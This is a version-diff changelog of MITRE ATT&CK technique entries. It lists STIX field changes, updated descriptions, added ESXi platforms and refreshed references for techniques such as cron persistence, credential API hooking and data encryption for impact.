dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_defense_bypassed | ['Signature-based detection', 'Host intrusion prevention systems', 'Anti-virus', 'Binary Analysis', 'Static File Analysis'] | |
x_mitre_system_requirements | ['Compiler software (either native to the system or delivered by the adversary)'] | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2024-10-03 17:43:14.766000+00:00 | 2025-04-15 19:59:06.564000+00:00 |
x_mitre_version | 1.1 | 1.2 |
[T1218.001] System Binary Proxy Execution: Compiled HTML File
Current version: 2.2
Version changed from: 2.1 → 2.2
Details
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_defense_bypassed | ['Digital Certificate Validation', 'Application control'] | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2023-10-18 16:31:56.936000+00:00 | 2025-04-15 19:58:56.001000+00:00 |
x_mitre_version | 2.1 | 2.2 |
[T1542.002] Pre-OS Boot: Component Firmware
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value
---|---|---
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_defense_bypassed | ['Anti-virus', 'Host intrusion prevention systems', 'File monitoring'] | |
x_mitre_permissions_required | ['SYSTEM'] | |
x_mitre_system_requirements | ['Ability to update component device firmware from the host operating system.'] | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2022-04-01 20:43:55.632000+00:00 | 2025-04-15 19:58:43.347000+00:00 |
external_references[3]['description'] | Pinola, M. (2014, December 14). 3 tools to check your hard drive's health and make sure it's not already dying on you. Retrieved October 2, 2018. | Pinola, M. (2014, December 14). 3 tools to check your hard drive's health and make sure it's not already dying on you. Retrieved November 17, 2024. |
external_references[3]['url'] | https://www.itworld.com/article/2853992/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html | https://www.computerworld.com/article/1484887/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html |
x_mitre_version | 1.1 | 1.2 |
[T1559.001] Inter-Process Communication: Component Object Model
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value
---|---|---
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_remote_support | True | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2021-07-26 22:51:20.448000+00:00 | 2025-04-15 19:58:18.425000+00:00 |
x_mitre_version | 1.1 | 1.2 |
[T1546.015] Event Triggered Execution: Component Object Model Hijacking
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2023-04-21 12:34:29.402000+00:00 | 2025-04-16 20:37:20.012000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.1 | 1.2 |
[T1554] Compromise Host Software Binary
Current version: 2.2
Version changed from: 2.1 → 2.2
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2024-10-12 16:52:46.067000+00:00 | 2025-04-15 19:58:52.206000+00:00 |
x_mitre_version | 2.1 | 2.2 |
iterable_item_added
STIX Field | Old value | New Value
---|---|---
x_mitre_platforms | | ESXi |
[T1584] Compromise Infrastructure
Current version: 1.6
Version changed from: 1.5 → 1.6
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2024-10-16 20:06:03.570000+00:00 | 2025-04-15 19:58:45.612000+00:00 |
description | Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.
Use of compromised infrastructure allows adversaries to stage, launch, and execute operations. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. For example, adversaries may leverage compromised infrastructure (potentially also in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) to further blend in and support staged information gathering and/or [Phishing](https://attack.mitre.org/techniques/T1566) campaigns.(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may also compromise infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090) and/or proxyware services.(Citation: amnesty_nso_pegasus)(Citation: Sysdig Proxyjacking)
By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig) | Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.
Use of compromised infrastructure allows adversaries to stage, launch, and execute operations. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. For example, adversaries may leverage compromised infrastructure (potentially also in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) to further blend in and support staged information gathering and/or [Phishing](https://attack.mitre.org/techniques/T1566) campaigns.(Citation: FireEye DNS Hijack 2019) Adversaries may also compromise numerous machines to support [Proxy](https://attack.mitre.org/techniques/T1090) and/or proxyware services or to form a botnet.(Citation: amnesty_nso_pegasus)(Citation: Sysdig Proxyjacking) Additionally, adversaries may compromise infrastructure residing in close proximity to a target in order to gain [Initial Access](https://attack.mitre.org/tactics/TA0001) via [Wi-Fi Networks](https://attack.mitre.org/techniques/T1669).(Citation: Nearest Neighbor Volexity)
By using compromised infrastructure, adversaries may enable follow-on malicious operations. Prior to targeting, adversaries may also compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig) |
external_references[4]['description'] | ICANN Security and Stability Advisory Committee. (2005, July 12). Domain Name Hijacking: Incidents, Threats, Risks and Remediation. Retrieved March 6, 2017. | ICANN Security and Stability Advisory Committee. (2005, July 12). Domain Name Hijacking: Incidents, Threats, Risks and Remediation. Retrieved November 17, 2024. |
external_references[4]['url'] | https://www.icann.org/groups/ssac/documents/sac-007-en | https://www.icann.org/en/ssac/registration-services/documents/sac-007-domain-name-hijacking-incidents-threats-risks-and-remediation-12-07-2005-en |
external_references[9]['description'] | Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021. | Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved November 17, 2024. |
external_references[9]['url'] | https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation | https://cloud.google.com/blog/topics/threat-intelligence/scandalous-external-detection-using-network-scan-data-and-automation/ |
x_mitre_version | 1.5 | 1.6 |
iterable_item_added
STIX Field | Old value | New Value
---|---|---
external_references | | {'source_name': 'Nearest Neighbor Volexity', 'description': 'Koessel, Sean. Adair, Steven. Lancaster, Tom. (2024, November 22). The Nearest Neighbor Attack: How A Russian APT Weaponized Nearby Wi-Fi Networks for Covert Access. Retrieved February 25, 2025.', 'url': 'https://www.volexity.com/blog/2024/11/22/the-nearest-neighbor-attack-how-a-russian-apt-weaponized-nearby-wi-fi-networks-for-covert-access/'} |
x_mitre_contributors | | Cian Heasley |
x_mitre_contributors | | Rouven Bissinger (SySS GmbH) |
[T1609] Container Administration Command
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_remote_support | True | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2024-10-15 16:25:45.507000+00:00 | 2025-04-15 19:58:44.024000+00:00 |
x_mitre_version | 1.2 | 1.3 |
[T1053.007] Scheduled Task/Job: Container Orchestration Job
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_permissions_required | ['User'] | |
x_mitre_remote_support | True | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2024-10-15 16:26:03.731000+00:00 | 2025-04-15 19:58:07.487000+00:00 |
x_mitre_version | 1.3 | 1.4 |
[T1218.002] System Binary Proxy Execution: Control Panel
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
dictionary_item_added
STIX Field | Old value | New Value
---|---|---
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_defense_bypassed | ['Application control'] | |
x_mitre_permissions_required | ['User', 'Administrator', 'SYSTEM'] | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2022-03-11 19:01:55.821000+00:00 | 2025-04-15 19:58:29.962000+00:00 |
x_mitre_version | 2.0 | 2.1 |
[T1136] Create Account
Current version: 2.6
Version changed from: 2.5 → 2.6
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2024-10-15 15:53:21.895000+00:00 | 2025-04-15 19:59:14.796000+00:00 |
x_mitre_version | 2.5 | 2.6 |
x_mitre_platforms[4] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value
---|---|---
x_mitre_platforms | | ESXi |
[T1134.002] Access Token Manipulation: Create Process with Token
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_defense_bypassed | ['Windows User Account Control', 'System access controls', 'File system access controls'] | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2023-04-11 21:14:37.714000+00:00 | 2025-04-16 20:37:17.537000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.2 | 1.3 |
[T1056.004] Input Capture: Credential API Hooking
Current version: 1.2
Version changed from: 1.1 → 1.2
New Detections:
- DS0011: Module (Module Load)
- DS0017: Command (Command Execution)
- DS0022: File (File Creation)
- DS0022: File (File Modification)
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2024-08-27 21:03:56.385000+00:00 | 2025-04-15 19:59:21.920000+00:00 |
description | Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
* **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
| Adversaries may hook into Windows application programming interface (API) functions and Linux system functions to collect user credentials. Malicious hooking mechanisms may capture API or function calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials.
In Windows, hooking involves redirecting calls to these functions and can be implemented via:
* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
* **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
In Linux and macOS, adversaries may hook into system functions via the `LD_PRELOAD` (Linux) or `DYLD_INSERT_LIBRARIES` (macOS) environment variables, which enables loading shared libraries into a program’s address space. For example, an adversary may capture credentials by hooking into the `libc read` function leveraged by SSH or SCP.(Citation: Intezer Symbiote 2022) |
external_references[6]['description'] | Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved December 12, 2017. | Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved November 17, 2024. |
external_references[6]['url'] | https://www.exploit-db.com/docs/17802.pdf | https://www.scribd.com/document/68671361/Inline-Hooking-in-Windows |
x_mitre_version | 1.1 | 1.2 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Intezer Symbiote 2022', 'description': 'Joakim Kennedy and The BlackBerry Threat Research & Intelligence Team. (2022, June 9). Symbiote Deep-Dive: Analysis of a New, Nearly-Impossible-to-Detect Linux Threat. Retrieved March 24, 2025.', 'url': 'https://intezer.com/blog/research/new-linux-threat-symbiote/'} |
x_mitre_data_sources | | Module: Module Load |
x_mitre_data_sources | | File: File Creation |
x_mitre_data_sources | | File: File Modification |
x_mitre_data_sources | | Command: Command Execution |
x_mitre_platforms | | Linux |
x_mitre_platforms | | macOS |
[T1110.004] Brute Force: Credential Stuffing
Current version: 1.7
Version changed from: 1.6 → 1.7
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 19:58:59.077000+00:00 |
x_mitre_version | 1.6 | 1.7 |
x_mitre_platforms[6] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1552.001] Unsecured Credentials: Credentials In Files
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_system_requirements | ['Access to files'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 14:28:43.639000+00:00 | 2025-04-15 19:58:47.301000+00:00 |
x_mitre_version | 1.2 | 1.3 |
[T1552.002] Unsecured Credentials: Credentials in Registry
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_system_requirements | ["Ability to query some Registry locations depends on the adversary's level of access. User permissions are usually limited to access of user-related Registry keys."] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 16:26:46.873000+00:00 | 2025-04-15 19:58:20.405000+00:00 |
x_mitre_version | 1.1 | 1.2 |
[T1053.003] Scheduled Task/Job: Cron
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User'] | |
x_mitre_remote_support | False | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 18:45:51.945000+00:00 | 2025-04-15 19:58:16.429000+00:00 |
description | Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques) The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths.
An adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003). | Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques) The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths.
An adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003). In ESXi environments, cron jobs must be created directly via the crontab file (e.g., `/var/spool/cron/crontabs/root`).(Citation: CloudSEK ESXiArgs 2023) |
x_mitre_version | 1.2 | 1.3 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'CloudSEK ESXiArgs 2023', 'description': 'Mehardeep Singh Sawhney. (2023, February 9). Analysis of Files Used in ESXiArgs Ransomware Attack Against VMware ESXi Servers. Retrieved March 26, 2025.', 'url': 'https://www.cloudsek.com/blog/analysis-of-files-used-in-esxiargs-ransomware-attack-against-vmware-esxi-servers'} |
x_mitre_platforms | | ESXi |
[T1071.004] Application Layer Protocol: DNS
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-12-26 20:54:38.721000+00:00 | 2025-04-15 19:58:10.065000+00:00 |
x_mitre_version | 1.2 | 1.3 |
x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1568.003] Dynamic Resolution: DNS Calculation
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-27 20:54:28.287000+00:00 | 2025-04-15 19:58:47.388000+00:00 |
x_mitre_version | 1.0 | 1.1 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1485] Data Destruction
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-25 20:46:14.641000+00:00 | 2025-04-15 19:59:11.731000+00:00 |
description | Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as del and rm often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.
Adversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) In some cases politically oriented image files have been used to overwrite data.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)
To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).
In cloud environments, adversaries may leverage access to delete cloud storage objects, machine images, database instances, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider) | Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as del and rm often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.
Adversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) In some cases politically oriented image files have been used to overwrite data.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)
To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).
In cloud environments, adversaries may leverage access to delete cloud storage objects, machine images, database instances, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider) Similarly, they may delete virtual machines from on-prem virtualized environments. |
external_references[4]['description'] | FireEye. (2016, November 30). FireEye Responds to Wave of Destructive Cyber Attacks in Gulf Region. Retrieved January 11, 2017. | FireEye. (2016, November 30). FireEye Responds to Wave of Destructive Cyber Attacks in Gulf Region. Retrieved November 17, 2024. |
external_references[4]['url'] | https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html | https://web.archive.org/web/20210126065851/https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html |
x_mitre_version | 1.3 | 1.4 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1132] Data Encoding
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-04-21 12:20:20.711000+00:00 | 2025-04-16 20:37:21.024000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.2 | 1.3 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1486] Data Encrypted for Impact
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-06-16 13:07:10.318000+00:00 | 2025-04-15 19:59:00.731000+00:00 |
description | Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018)
In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted (and often renamed and/or tagged with specific file markers). Adversaries may need to first employ other behaviors, such as [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529), in order to unlock and/or gain access to manipulate these files.(Citation: CarbonBlack Conti July 2020) In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017)
To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017) Encryption malware may also leverage [Internal Defacement](https://attack.mitre.org/techniques/T1491/001), such as changing victim wallpapers, or otherwise intimidate victims by sending ransom notes or other messages to connected printers (known as "print bombing").(Citation: NHS Digital Egregor Nov 2020)
In cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1) | Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018)
In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted (and often renamed and/or tagged with specific file markers). Adversaries may need to first employ other behaviors, such as [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529), in order to unlock and/or gain access to manipulate these files.(Citation: CarbonBlack Conti July 2020) In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017) Adversaries may also encrypt virtual machines hosted on ESXi or other hypervisors.(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)
To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017) Encryption malware may also leverage [Internal Defacement](https://attack.mitre.org/techniques/T1491/001), such as changing victim wallpapers or ESXi server login messages, or otherwise intimidate victims by sending ransom notes or other messages to connected printers (known as "print bombing").(Citation: NHS Digital Egregor Nov 2020)(Citation: Varonis)
In cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1) For example, in AWS environments, adversaries may leverage services such as AWS’s Server-Side Encryption with Customer Provided Keys (SSE-C) to encrypt data.(Citation: Halcyon AWS Ransomware 2025) |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.4 | 1.5 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Halcyon AWS Ransomware 2025', 'description': 'Halcyon RISE Team. (2025, January 13). Abusing AWS Native Services: Ransomware Encrypting S3 Buckets with SSE-C. Retrieved March 18, 2025.', 'url': 'https://www.halcyon.ai/blog/abusing-aws-native-services-ransomware-encrypting-s3-buckets-with-sse-c'} |
external_references | | {'source_name': 'Varonis', 'description': 'Jason Hill. (2023, February 8). VMware ESXi in the Line of Ransomware Fire. Retrieved March 26, 2025.', 'url': 'https://www.varonis.com/blog/vmware-esxi-in-the-line-of-ransomware-fire'} |
external_references | | {'source_name': 'Crowdstrike Hypervisor Jackpotting Pt 2 2021', 'description': 'Michael Dawson. (2021, August 30). Hypervisor Jackpotting, Part 2: eCrime Actors Increase Targeting of ESXi Servers with Ransomware. Retrieved March 26, 2025.', 'url': 'https://www.crowdstrike.com/en-us/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/'} |
x_mitre_platforms | | ESXi |
[T1001] Data Obfuscation
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-07 15:07:47.232000+00:00 | 2025-04-15 19:58:57.412000+00:00 |
x_mitre_version | 1.1 | 1.2 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1074] Data Staged
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-30 13:28:37.415000+00:00 | 2025-04-15 19:58:45.225000+00:00 |
external_references[1]['description'] | Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020. | Mandiant. (2020, February). M-Trends 2020. Retrieved November 17, 2024. |
x_mitre_version | 1.4 | 1.5 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1030] Data Transfer Size Limits
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-07-14 19:47:46.912000+00:00 | 2025-04-15 19:59:05.559000+00:00 |
x_mitre_version | 1.0 | 1.1 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1602] Data from Configuration Repository
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-19 21:32:58.274000+00:00 | 2025-04-16 20:37:15.147000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[0] | Network | Network Devices |
[T1005] Data from Local System
Current version: 1.7
Version changed from: 1.6 → 1.7
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_system_requirements | ['Privileges to access certain files and directories'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-04-12 23:54:39.466000+00:00 | 2025-04-15 19:58:24.318000+00:00 |
